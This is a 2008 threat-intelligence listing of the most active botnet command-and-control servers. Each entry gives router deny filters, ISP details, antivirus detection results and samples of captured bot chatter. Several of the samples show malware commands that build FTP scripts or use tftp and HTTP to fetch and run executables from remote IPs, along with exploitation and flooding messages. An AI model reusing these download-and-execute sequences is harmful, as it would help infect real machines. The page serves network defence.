Download our list of the most observed botnet command and control server IP addresses.

Most Prolific BotNet Command and Control Servers and Filters

Sat Jul 5 10:13:10 2008

10 Day Filter Set      30 Day Filter Set      

Priority 100 TCP Ports 7000 7000 85 7000 218 Filter deny ip host 211.096.097.044 any log ! 551 infects 04/27/08 to 05/12/08 cnuninet.net ISP china united telecommunications corporation
Clients 551 china Activity Domain cnuninet.net
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Client: PASS a
  • Server: RETR msnnmaneger.exe
  • Client: PASS saad
  • Client: NICK GOGO5-lzpgfsUSER GOGO5-lzpgfs 0 0 :GOGO5-lzpgfs
  • Client: PASS saadNICK GOGO5-lzpgfsUSER GOGO5-lzpgfs 0 0 :GOGO5-lzpgfs
  • Client: PASS saadNICK GOGO5-lzpgfsUSER GOGO5-lzpgfs 0 0 :GOGO5-lzpgfs
  • Client: PASS saadNICK GOGO5-lzpgfsUSER GOGO5-lzpgfs 0 0 :GOGO5-lzpgfs
  • Client: PASS saadNICK GOGO5-lzpgfsUSER GOGO5-lzpgfs 0 0 :GOGO5-lzpgfs
  • Client: PASS saadNICK GOGO5-lzpgfsUSER GOGO5-lzpgfs 0 0 :GOGO5-lzpgfs

more....

BotClient Antivirus Diagnoses
AhnLab-V3Win-Privateexeprotector.199884
AntiVirTRCrypt.XPACK.Gen
AuthentiumMISSED
Avast_Kolab-S
AVGDropper.Delf.ACL
BitDefenderVirtob.2.Dam
CAT-QuickHealI-Kolab.ep
ClamAVKolab-111
DrWebIRC.Bot
eSafeMISSED
eTrust-VetForBot.VD
EwidoMISSED
FileAdvisorMISSED
FortinetKolab.EP!tr
F-ProtZlob.CWW
F-SecureSdBot.CJU
IkarusPacker.PrivateExeProtector.A
KasperskyMISSED
McAfeeGeneric.dx
MicrosoftMISSED
NOD32v2MISSED
NormanSmalltroj.DYNC
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalGeneric-A
SunbeltMISSED
SymantecMISSED
TheHackerKolab.rw
VBA32MISSED
VirusBusterAgobot.WPDA
Webwasher
Gateway
Crypt.XPACK.Gen
Priority 100 TCP Ports 443 443 85 Filter deny ip host 217.170.244.002 any log ! 370 infects 01/08/08 to 07/04/08 - ISP ndermarrja telekomunikuese ktdn-ads
Clients 370 serbia and montenegro Activity Domain -
Chatter Example
  • Server: echo open 85.127.158.6 14674>o&echo USER a>>o&echo a>>o&echo...
  • Client: USER a
  • Server: 331 Password required
  • Client: PASS a
  • Server: 230 User logged in.
  • Server: RETR resource32w.exe
  • Server: 150 Opening BINARY mode data connection
  • Client: NICK [SOUL]541264USER aeshsrej 0 0 :[SOUL]541264
  • Server: :irc.celestial.org NOTICE AUTH :*** Looking up your...
  • Server: :irc.celestial.org NOTICE [SOUL]541264 :*** If you are having...
  • Server: PONG :FF20F9C9
  • Client: JOIN #hell troopers
  • Client: USERHOST [SOUL]541264MODE [SOUL]541264 +ixJOIN #hell...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirSdBo.100864.22
AuthentiumSdbot.OKR
Avast_Trojano-3403
AVGIRCBackDoor.SdBot.OZG
BitDefenderRbot.GNN
CAT-QuickHealRbot.gen
ClamAVMISSED
DrWebHLLW.MyBot.based
eSafeRbot
eTrust-VetRbot.EDK
EwidoRbot
FileAdvisorMISSED
FortinetRBot!tr.bdr
F-ProtSdbot.OKR
F-SecureMISSED
IkarusRbot
KasperskyRbot.gen
McAfeeSdbot.gen.x
MicrosoftRbot!DF7F
NOD32v2MISSED
NormanSpybot.AADO
PandaSdbot.FRD.worm
Prevx1MISSED
RisingMISSED
SophosRbot-BAB
SunbeltRbot.ic
SymantecSpybot.Worm
TheHackerBackdoorRbot.gen
VBA32Rbot.gen
VirusBusterRBot.DBI
Webwasher
Gateway
MISSED
Priority 100 TCP Ports 7000 8885 Filter deny ip host 222.177.011.165 any log ! 216 infects 05/12/08 to 06/06/08 - ISP renhexiaoxue
Clients 216 china Activity Domain -
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR msnmanegers.exe
  • Client: PASS saad
  • Client: PASS saadNICK GOGO6-yrzgsrtbUSER GOGO6-yrzgsrtb 0 0...
  • Client: PASS saadNICK GOGO6-yrzgsrtbUSER GOGO6-yrzgsrtb 0 0...
  • Client: PASS saadNICK GOGO6-yrzgsrtbUSER GOGO6-yrzgsrtb 0 0...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Kolab.200441
AntiVirTRCrypt.XPACK.Gen
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderPacker.PrivateExeProtector.A
CAT-QuickHealI-Kolab.re
ClamAVMISSED
DrWebIRC.Bot
eSafeMISSED
eTrust-VetForBot.VC
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtZlob.CWP
F-SecureKolab.qa
IkarusPacker.PrivateExeProtector.A
KasperskyKolab.qa
McAfeeGeneric.dx
MicrosoftIrcbrute
NOD32v2Kolab.QW
NormanSmalltroj.DVMM
PandaMISSED
Prevx1SPYBOTAX.99328
RisingMISSED
SophosMalGeneric-A
SunbeltMISSED
SymantecSpybot.Worm
TheHackerKolab.re
VBA32Kolab.qa
VirusBusterMISSED
Webwasher
Gateway
Crypt.XPACK.Gen
Priority 100 TCP Ports 80 65520 211 65520 209 65520 210 80 211 65520 69 65520 217 80 64 65520 222 80 217 Filter deny ip host 085.114.137.060 any log ! 127 infects 04/10/08 to 06/03/08 fastit.net ISP fastit
Clients 127 germany Activity Domain fastit.net
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 119.17.99.246:2733

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirVirut.X
AuthentiumKorgo.V
Avast_Padobot-Q
AVGKorgo.A
BitDefenderPadobot.BV.Dam
CAT-QuickHealVirut.F
ClamAVPadobot.M
DrWebVirut.5
eSafeVirut.gen
eTrust-VetVirut.10683
EwidoPadobot.m
FileAdvisorMISSED
FortinetMetaCrypt.1
F-ProtKorgo.V
F-SecureHorst.gen33
IkarusKorgo.S
KasperskyPadobot.m
McAfeeVirut.gen
MicrosoftVirut.L
NOD32v2Virut.Q
NormanHorst.gen33
PandaVirutas.gen
Prevx1MISSED
RisingVirut.GEN
SophosVetor-A
SunbeltMISSED
SymantecVirut.U
TheHackerVirut.gen2
VBA32Virut.q
VirusBusterVirut.Gen.5
Webwasher
Gateway
Virut.X
Priority 100 TCP Ports 9890 Filter deny ip host 069.042.216.090 any log ! 121 infects 03/31/08 to 07/03/08 awknet.com ISP awknet communications llc
Clients 121 united states Activity Domain awknet.com
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR igxdfdfds.com
  • Client: NICK X-jwdwvlUSER X-jwdwvl 0 0 :X-jwdwvl
  • Server: :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
  • Client: JOIN ##X## Xkey
  • Server: :X-jwdwvl!X-jwdwvl@192.168.1.14 JOIN :##x##:irc.foonet.com 332...
  • Client: USERHOST X-jwdwvlJOIN ##X## XkeyUSERHOST X-jwdwvlJOIN ##X##...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRCrypt.TPM.Gen
AuthentiumMISSED
AvastMISSED
AVGRBot.FA
BitDefenderDeepScan_Generic.Sdbot.EE8FDC31
CAT-QuickHealSdBot.gen
ClamAVPUA.Packed.Themida
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureSDBot.gen8
IkarusGeneric.Sdbot
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanSDBot.gen8
PandaMISSED
Prevx1Generic.Malware
RisingMISSED
SophosSusComPack
SunbeltMISSED
SymantecMISSED
TheHackerBehav-Heuristic-064
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
Crypt.TPM.Gen
Priority 100 TCP Ports 13001 12351 Filter deny ip host 069.247.147.113 any log ! 110 infects 06/27/08 to 07/04/08 comcast.net ISP comcast cable communications inc
Clients 110 united states Activity Domain comcast.net
Chatter Example
  • Client: echo open 83.135.227.132 4873>.pif C:\\WINDOWS\\system32>
  • Client: echo user a a>>.pif C:\\WINDOWS\\system32>
  • Client: echo binary>>.pif C:\\WINDOWS\\system32>
  • Client: echo GET ctfmom.exe>>.pif C:\\WINDOWS\\system32>
  • Client: echo bye>>.pif C:\\WINDOWS\\system32>
  • Client: echo @echo off >c.batC:\\WINDOWS\\system32>
  • Client: echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32>
  • Client: echo ctfmom.exe >>c.batC:\\WINDOWS\\system32>
  • Client: echo del .pif >>c.batC:\\WINDOWS\\system32>
  • Client: echo del /F c.bat >>c.batC:\\WINDOWS\\system32>
  • Client: echo exit /y >>c.batC:\\WINDOWS\\system32>
  • Client: USER a
  • Client: PASS a
  • Server: RETR ctfmom.exe
  • Client: NICK `kowkqhvrUSER `kowkqhvr 0 0 :`kowkqhvr
  • Client: JOIN #.has hs
  • Server: :`kowkqhvr!~kowkqhvr@192.168.1.37 JOIN :#.has:aaa.39213.com 332...
  • Client: USERHOST `kowkqhvrJOIN #.has hsUSERHOST `kowkqhvrJOIN #.has...
  • Client: JOIN #.r
  • Server: :`kowkqhvr!~kowkqhvr@192.168.1.37 JOIN :#.r:aaa.39213.com 332...
  • Client: PRIVMSG #.lagja :lsass: exploited (127.112.38.172)
  • Client: PRIVMSG #.lagja :lsass: exploited (127.112.38.172)PRIVMSG #.lagja...
  • Client: PRIVMSG #.lagja :lsass: exploited (127.112.38.172)PRIVMSG #.lagja...
  • Client: PRIVMSG #.lagja :lsass: exploited (127.112.38.172)PRIVMSG #.lagja...
  • Client: PRIVMSG #.lagja :lsass: exploited (127.112.38.172)PRIVMSG #.lagja...
  • Client: PRIVMSG #.lagja :lsass: exploited (127.112.38.172)PRIVMSG #.lagja...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirWootBot.87882
AuthentiumMISSED
AvastMISSED
AVGPolyCrypt
BitDefenderGenPack_Generic.Sdbot.4F05FAA9
CAT-QuickHealWootbot.gen
ClamAVMISSED
DrWebPacked.494
eSafeWootbot.gen
eTrust-VetForBot.WC
EwidoWootbot
FileAdvisorMISSED
FortinetWootBot!tr.bdr
F-ProtMISSED
F-SecureWootbot.gen
IkarusWootbot
KasperskyWootbot.gen
McAfeeMISSED
MicrosoftWootbot
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosMalGeneric-A
SunbeltMISSED
SymantecMISSED
TheHackerBackdoorWootbot.gen
VBA32Wootbot.gen
VirusBusterMISSED
Webwasher
Gateway
WootBot.87882
Priority 100 TCP Ports 7000 Filter deny ip host 209.250.232.240 any log ! 109 infects 05/19/08 to 06/10/08 justedge.net ISP justedge networks inc
Clients 109 united states Activity Domain justedge.net
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR hotefix.exe
  • Client: PASS saad
  • Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
  • Client: NICK GOGO9-sdoxmpjUSER GOGO9-sdoxmpj 0 0 :GOGO9-sdoxmpj
  • Server: :irc.priv8net.com NOTICE AUTH :*** Couldn\\'t resolve your...
  • Client: JOIN #scop# servec
  • Client: USERHOST GOGO9-sdoxmpjJOIN #scop# servecUSERHOST...
  • Server: :GOGO9-sdoxmpj!GOGO9-sdox@192.168.1.105 JOIN...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRCrypt.XPACK.Gen
AuthentiumMISSED
Avast_Agent-LKZ
AVGMISSED
BitDefenderPacker.PrivateExeProtector.A
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureSuspicious_Malware!Gemini
IkarusPacker.PrivateExeProtector.A
KasperskyHeur.Generic
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingMISSED
SophosSusUnkPacker
SunbeltMISSED
SymantecPacked.Generic.52
TheHackerMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
Crypt.XPACK.Gen
Priority 89 TCP Ports 65520 72 80 65520 217 65520 67 65520 69 Filter deny ip host 085.114.143.208 any log ! 86 infects 01/23/08 to 04/21/08 fastit.net ISP fastit
Clients 86 germany Activity Domain fastit.net
Chatter Example
  • Client: NICK umrzitlqUSER b020501 . . :-
  • Client: JOIN &virtu
  • Server: PONG :i
  • Client: JOIN &virtu
  • Client: USER hsbibe hsbibe hsbibe :vslcwitliqyqoyjf
  • Server: NICK gXkPovbc
  • Server: NICK gXkPovbc
  • Server: NICK gXkPovbc
  • Server: NICK gXkPovbc
  • Server: PONG :i
  • Client: JOIN &virtu
  • Server: NICK gXkPovbc
  • Server: NICK gXkPovbc
  • Server: PONG :i
  • Client: JOIN &virtu
  • Server: PONG :i
  • Client: JOIN &virtu
  • Server: PONG :i
  • Client: JOIN &virtu
  • Server: PONG :i
  • Client: JOIN &virtu
  • Server: PONG :i
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3Virut.D
AntiVirVirut.Gen
AuthentiumVirut.9264
Avast_Virut
AVGVirut
BitDefenderVirtob.3.Gen
CAT-QuickHealVirut.D
ClamAVVirut.di
DrWebVirut.5
eSafeMISSED
eTrust-VetVirut.9276
EwidoMISSED
FileAdvisorMISSED
FortinetVirut.E
F-ProtVirut.9264
F-SecureVirut.BF
IkarusTrojan-Downloader.Aboma.b
KasperskyVirut.n
McAfeeVirut.gen
MicrosoftVirut.C
NOD32v2Virut.E
NormanVirut.BF
PandaVirutas.G
Prevx1MISSED
RisingVirut.GEN
SophosVetor-A
SunbeltVIPRE.Suspicious
SymantecVirut.B
TheHackerVirut.f
VBA32Virut.3
VirusBusterVirut.Gen
Webwasher
Gateway
Virut.Gen
Priority 82 TCP Ports 3266 3366 3267 3267 85 3366 69 Filter deny ip host 069.042.216.124 any log ! 80 infects 02/03/08 to 04/25/08 awknet.com ISP awknet communications llc
Clients 80 united states Activity Domain awknet.com
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR Srb0ty.exe
  • Client: NICK F-oiltbiUSER F-oiltbi 0 0 :F-oiltbi
  • Server: :Irc.Sr.Net NOTICE AUTH :*** Looking up your hostname...
  • Client: JOIN ##for## f
  • Server: :F-oiltbi!F-oiltbi@192.168.1.77 JOIN :##for##:Irc.Sr.Net 332...
  • Client: USERHOST F-oiltbiJOIN ##for## fUSERHOST F-oiltbiJOIN ##for##...

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirHEURCrypted
AuthentiumMISSED
AvastMISSED
AVGSHeur.AEFJ
BitDefenderDeepScan_Generic.Malware.KIFWXg.DA485DBA
CAT-QuickHealSdBot.gen
ClamAVPUA.Packed.Themida
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureRbot.gda
IkarusGeneric.Sdbot
KasperskyRbot.gda
McAfeeGeneric.dx
MicrosoftMISSED
NOD32v2Wootbot.NIW
NormanMISSED
PandaGaobot.QCQ.worm
Prevx1DIMPY.WIN32VBSY.Q
RisingMISSED
SophosSusComPack
SunbeltVIPRE.Suspicious
SymantecSpybot.Worm
TheHackerBehav-Heuristic-064
VBA32MISSED
VirusBusterRBot.UXK
Webwasher
Gateway
Heuristic.Crypted
Priority 76 TCP Ports 65520 65520 69 65520 72 65520 217 Filter deny ip host 210.245.211.011 any log ! 74 infects 06/28/08 to 07/04/08 romlox.net ISP kingdom - internet access
Clients 74 hong kong Activity Domain romlox.net
Chatter Example
  • Client: NICK nwusuwdbUSER q020500 . . :-
  • Client: Service Pack 2JOIN &virtu
  • Server: :* PRIVMSG nwusuwdb :!get...
  • Client: GET /~grander/unpr.exe HTTP/1.0User-Agent: DownloadHost:...
  • Server: GET /17PHolmes.cmt HTTP/1.0User-Agent: TESTHost:...
  • Server: PONG :i
  • Client: JOIN &virtu
  • Server: PONG :i
  • Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRCrypt.ULPM.Gen
AuthentiumHeuristic-166!Eldorado
Avast_Agent-ZII
AVGDownloader.Small.CJS
BitDefenderDropper.RZF
CAT-QuickHealTrojanDropper.Small.bkz
ClamAVMISSED
DrWebMulDrop.15779
eSafeMISSED
eTrust-VetMultidropper.DB
EwidoDropper.Small.bkz
FileAdvisorMISSED
FortinetSmall.BKZ!tr
F-ProtHeuristic-166!Eldorado
F-SecureTrojan-Dropper.Small.bkz
IkarusTrojan-Dropper.Small.bkz
KasperskyTrojan-Dropper.Small.bkz
McAfeeMISSED
MicrosoftTrojanDownloader_Matcash.F
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingUndef.ipp
SophosMalDownLdr-O
SunbeltMISSED
SymantecDropper
TheHackerMISSED
VBA32Trojan-Dropper.Small.bkz
VirusBusterMISSED
Webwasher
Gateway
Crypt.ULPM.Gen
Priority 57 TCP Ports 7000 7000 85 Filter deny ip host 067.019.050.066 any log ! 55 infects 01/11/08 to 04/09/08 theplanet.com ISP theplanet.com internet services inc
Clients 55 united states Activity Domain theplanet.com
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR msnnmaneger.exe
  • Client: PASS saad
  • Client: NICK TAHY-ycymjyUSER TAHY-ycymjy 0 0 :TAHY-ycymjy
  • Client: JOIN #scop# servec
  • Client: USERHOST TAHY-ycymjy

more....

BotClient Antivirus Diagnoses
AhnLab-V3MISSED
AntiVirTRCrypt.XPACK.Gen
AuthentiumMISSED
AvastMISSED
AVGRBot.AX
BitDefenderMISSED
CAT-QuickHealSdBot.gen
ClamAVPUA.Packed.Themida
DrWebMISSED
eSafeMISSED
eTrust-VetForBot.TW
EwidoMISSED
FileAdvisorMISSED
FortinetSDBot.FOG!tr.bdr
F-ProtMISSED
F-SecureKolab.m
IkarusGeneric.Sdbot
KasperskyKolab.m
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1DIMPY.WIN32VBSY.Q
RisingMISSED
SophosMISSED
SunbeltSDBot
SymantecSdbot
TheHackerBehav-Heuristic-064
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
Crypt.XPACK.Gen
Priority 53 TCP Ports 6667 6668 7000 3921 Filter deny ip host 063.173.172.098 any log ! 52 infects 01/07/08 to 06/25/08 - ISP splk_tele yemen
Clients 52 yemen Activity Domain -
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR Tilecomnu.com
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK NU-917203130USER rgwuppyyed 0 0 :NU-917203130
  • Client: USERHOST NU-917203130
  • Client: MODE NU-917203130 +x+iJOIN #dd dpassUSERHOST NU-917203130MODE...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Win-Xema.variant
AntiVirBDSAgent.R.3
AuthentiumMISSED
Avast_Agent-DGQ
AVGAgent.CVE
BitDefenderGenlot.BCD
CAT-QuickHealAgent.r
ClamAVAgent-1373
DrWebHLLW.MyBot
eSafeMISSED
eTrust-VetRbot.FSE
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtThreat-HLLIN-Slipper-based!Maximus
F-SecureAgent.r
IkarusAgent.R
KasperskyAgent.r
McAfeeMISSED
MicrosoftRbot!2AC0
NOD32v2Rbot
NormanAgent.APUE
PandaGaobot.OJE.worm
Prevx1Malware.Gen
RisingIRCbot.egs
SophosMalPacker
SunbeltMISSED
SymantecSpybot.Worm
TheHackerBackdoorAgent.r
VBA32Agent.r
VirusBusterRBot.IFJ
Webwasher
Gateway
Agent.R.3
Priority 49 TCP Ports 80 Filter deny ip host 194.054.090.246 any log ! 48 infects 05/29/08 to 07/03/08 monkey.hosting.ua ISP hosting.ua datacentre allocation
Clients 48 ukraine Activity Domain monkey.hosting.ua
Chatter Example
  • Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.100.53.3:4135
  • Server: GET /index.php?id=efnimnwxhgktonjlvwd&scn=0&inf=0&ver=19&cnt=USA...

more....

BotClient Antivirus Diagnoses
AhnLab-V3Korgo.Gen
AntiVirKorgo.U
AuthentiumKorgo.V
Avast_Padobot-Q
AVGPadobot.V
BitDefenderPadobot.M
CAT-QuickHealKorgo.V
ClamAVMISSED
DrWebLsabot
eSafePadobot.m
eTrust-VetKorgo.V
EwidoPadobot.m
FileAdvisorMISSED
FortinetPadobot.M!worm
F-ProtKorgo.V
F-SecureMISSED
IkarusKorgo.S
KasperskyPadobot.m
McAfeeKorgo.v
MicrosoftKorgo.V
NOD32v2MISSED
NormanKorgo.AL
PandaKorgo.U.worm
Prevx1MISSED
RisingMISSED
SophosKorgo-T
SunbeltKorgo
SymantecKorgo.V
TheHackerKorgo.V
VBA32Padobot.m
VirusBusterKorgo.V
Webwasher
Gateway
MISSED
Priority 47 TCP Ports 7000 Filter deny ip host 210.217.196.011 any log ! 46 infects 05/10/08 to 05/12/08 innosoft.biz ISP intertns-lline-giga
Clients 46 korea_ republic of Activity Domain innosoft.biz
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR msnmanegers.exe
  • Client: PASS saad
  • Client: NICK GOGO6-yikrirUSER GOGO6-yikrir 0 0 :GOGO6-yikrir
  • Client: JOIN #scop# servec
  • Client: USERHOST GOGO6-yikrir
  • Server: :GOGO6-yikrir!~GOGO6-yikrir@192.168.1.205 JOIN :#scop#

more....

BotClient Antivirus Diagnoses
AhnLab-V3Kolab.200441
AntiVirTRCrypt.XPACK.Gen
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderPacker.PrivateExeProtector.A
CAT-QuickHealI-Kolab.re
ClamAVMISSED
DrWebIRC.Bot
eSafeMISSED
eTrust-VetForBot.VC
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtZlob.CWP
F-SecureKolab.qa
IkarusPacker.PrivateExeProtector.A
KasperskyKolab.qa
McAfeeGeneric.dx
MicrosoftIrcbrute
NOD32v2Kolab.QW
NormanSmalltroj.DVMM
PandaMISSED
Prevx1SPYBOTAX.99328
RisingMISSED
SophosMalGeneric-A
SunbeltMISSED
SymantecSpybot.Worm
TheHackerKolab.re
VBA32Kolab.qa
VirusBusterMISSED
Webwasher
Gateway
Crypt.XPACK.Gen
Priority 45 TCP Ports 3838 2293 7382 8492 9283 3938 7763 9928 3240 Filter deny ip host 072.010.172.218 any log ! 44 infects 01/07/08 to 07/02/08 webdesignpro.org ISP globotech communications
Clients 44 canada Activity Domain webdesignpro.org
Chatter Example
  • Client: dir dllcache\\tftpd.exe
  • Client: tftp -i 218.86.236.21 get svchost.exe wins\\SVCHOST.EXE
  • Client: tftp -i 218.86.236.21 get dllhost.exe wins\\DLLHOST.EXE
  • Client: USER wqxtha wqxtha wqxtha :wcgiqpactwttffqy
  • Client: NICK BOwPfQth
  • Server: PONG :2D7EF205
  • Client: MODE BOwPfQth +xi
  • Client: JOIN ##pi## USERHOST BOwPfQth
  • Server: :x.hub.x 332 BOwPfQth ##pi## :* ipscan s.s.s dcom2 -s ][ *...
  • Client: GET /mub.exe HTTP/1.0Host: 72.8.143.164

more....

BotClient Antivirus Diagnoses
AhnLab-V3Win-Xema.variant
AntiVirTRCrypt.PCMM.Gen
AuthentiumMISSED
AvastMISSED
AVGMISSED
BitDefenderKolabc.A
CAT-QuickHealMISSED
ClamAVMISSED
DrWebMISSED
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtMISSED
F-SecureKolabc.bto
IkarusKolabc.bto
KasperskyKolabc.bto
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1MISSED
RisingIRCbot.djy
SophosMalTibsPak
SunbeltMISSED
SymantecMISSED
TheHackerMISSED
VBA32MISSED
VirusBusterMISSED
Webwasher
Gateway
Crypt.PCMM.Gen
Priority 44 TCP Ports 7000 Filter deny ip host 218.093.014.236 any log ! 43 infects 04/29/08 to 05/03/08 - ISP jintan changshen elementary school
Clients 43 china Activity Domain -
Chatter Example
  • Client: USER a
  • Client: PASS a
  • Server: RETR hotfixs.exe
  • Client: NICK TAHY-yzlidrUSER TAHY-yzlidr 0 0 :TAHY-yzlidr
  • Client: JOIN #scop# servec
  • Client: USERHOST TAHY-yzlidr
  • Server: :TAHY-yzlidr!~TAHY-yzlidr@192.168.1.210 JOIN :#SCOP#:ABOSAL7 332...

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.variant
AntiVirTRCrypt.TPM.Gen
AuthentiumMISSED
Avast_Rbot-FHT
AVGSHeur.ADOK
BitDefenderDeepScan_Generic.Sdbot.DB298152
CAT-QuickHealSdBot.gen
ClamAVPUA.Packed.Themida
DrWebMISSED
eSafeMISSED
eTrust-VetForBot.TT
EwidoMISSED
FileAdvisorMISSED
FortinetSDBot.GAV!worm
F-ProtBackdoor2.KLJ
F-SecureMISSED
IkarusGeneric.Sdbot
KasperskyMISSED
McAfeeMISSED
MicrosoftMISSED
NOD32v2MISSED
NormanMISSED
PandaMISSED
Prevx1DIMPY.WIN32VBSY.Q
RisingRbot.fda
SophosSusComPack
SunbeltMISSED
SymantecMISSED
TheHackerBehav-Heuristic-064
VBA32MISSED
VirusBusterRbot.UWC
Webwasher
Gateway
Crypt.TPM.Gen
Priority 37 TCP Ports 6668 6667 6667 63 6667 85 7000 7000 63 Filter deny ip host 203.186.079.248 any log ! 36 infects 01/07/08 to 03/22/08 ctinets.com ISP i t city international ltd - por mee factory bui
Clients 36 hong kong Activity Domain ctinets.com
Chatter Example
  • Client: USER 1
  • Server: 331 Password required
  • Client: PASS 1
  • Server: 230 User logged in.
  • Server: RETR Tilesoft.com
  • Server: 150 Opening BINARY mode data connection
  • Server: 221 Goodbye happy r00ting.
  • Client: NICK SF-922833734USER gfvdqzsuv 0 0 :SF-922833734
  • Client: USERHOST SF-922833734
  • Client: MODE SF-922833734 +x+iJOIN #dd dpassUSERHOST SF-922833734MODE...
  • Server: :FR!~h4cktsIne@room PRIVMSG #dd :xhi hi -s
  • Server: :FR!~h4cktsIne@room PRIVMSG #dd :xusa ack 3637848342 13021 30
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Server: :FR!~h4cktsIne@room PRIVMSG #dd :xusa ack 3637848342 13021...
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Server: :ns1.xxx.us 404 SF-922833734 #dd : ...
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Server: :FR!~h4cktsIne@room PRIVMSG #dd :xusa ack 3637848342 13021 30
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Server: :FR!~h4cktsIne@room PRIVMSG #dd :xusa ack 3637848342 13021 30
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Server: :FR!~h4cktsIne@room PRIVMSG #dd :xusa ack 3637848342 13021 30
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Server: :FR!~h4cktsIne@room PRIVMSG #dd :xusa ack 3637848342 13021 30
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Server: :FR!~h4cktsIne@room PRIVMSG #dd :xusa ack 3637848342 13021 30
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...
  • Server: :FR!~h4cktsIne@room PRIVMSG #dd :xusa ack 3637848342 13021 30
  • Client: PRIVMSG #dd :\\002e\\002(1.0b) ( tcp.m\\037d\\037l )...

more....

BotClient Antivirus Diagnoses
AhnLab-V3IRCBot.variant
AntiVirRbot.205824.1
AuthentiumMISSED
Avast_EggDrop-AC
AVGRobobot.HC
BitDefenderDeepScan_Generic.Sdbot.4A245279
CAT-QuickHealRbot.aus
ClamAVMybot-7905
DrWebHLLW.MyBot
eSafeMISSED
eTrust-VetMISSED
EwidoMISSED
FileAdvisorMISSED
FortinetMISSED
F-ProtHeuristic-162!Eldorado
F-SecureRbot.aus
IkarusRbot.aus
KasperskyRbot.aus
McAfeeMISSED
MicrosoftRbot
NOD32v2MISSED
NormanSpybot.CBYO
PandaMISSED
Prevx1MISSED
RisingRbot.aus
SophosMISSED
SunbeltVIPRE.Suspicious
SymantecSpybot.Worm
TheHackerBackdoorRbot.aus
VBA32Rbot.aus
VirusBusterRBot.ORR
Webwasher
Gateway
Rbot.205824.1
